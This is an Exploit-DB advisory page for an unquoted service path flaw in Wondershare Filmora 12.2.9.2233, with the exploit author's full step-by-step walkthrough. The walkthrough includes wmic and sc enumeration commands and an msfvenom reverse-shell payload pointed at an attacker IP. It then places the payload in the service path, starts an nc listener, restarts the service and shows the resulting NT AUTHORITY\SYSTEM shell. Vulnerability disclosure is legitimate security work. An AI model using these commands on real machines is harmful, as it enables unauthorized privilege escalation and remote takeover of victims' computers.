Wondershare Filmora 12.2.9.2233 - Unquoted Service Path

vendor:

Filmora

by:

msd0pe

7.5

CVSS

HIGH

Unquoted Service Path

CWE

Product Name: Filmora

Affected Version From: 12.2.9.2233

Affected Version To: 12.2.9.2233

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

Wondershare Filmora 12.2.9.2233 – Unquoted Service Path

Wondershare Filmora versions <= 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level. An attacker can find the unquoted service path using the wmic command, get information about the service using the sc qc command, generate a reverse shell using msfvenom, upload the reverse shell to the unquoted service path, start a listener, and reboot the service/server to gain system level privileges.

Mitigation:

Ensure that all services have quoted service paths and that all services are running with the least privileges necessary.

Source

Exploit-DB raw data:

############################################################################
#                                                                          #
#  Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path  #
#  Date: 2023/04/23                                                        #
#  Exploit Author: msd0pe                                                  #
#  Vendor Homepage: https://www.wondershare.com                            #
#  My Github: https://github.com/msd0pe-1                                  # 
#                                                                          # 
############################################################################

Wondershare Filmora:
Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.

[1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Native Push Service   NativePushService   C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe   Auto

[2] Get informations about the service:
    > sc qc "NativePushService"

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: NativePushService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Wondershare Native Push Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem


[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe

[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
    > put Wondershare.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 .
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 ..
    drw-rw-rw-          0  Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
    drw-rw-rw-          0  Sun Apr 23 14:37:13 2023 Wondershare NativePush
    -rw-rw-rw-       7168  Sun Apr 23 14:51:47 2023 Wondershare.exe
    drw-rw-rw-          0  Sun Apr 23 13:52:30 2023 WSHelper


[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop "NativePushService"
    > sc start "NativePushService"

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system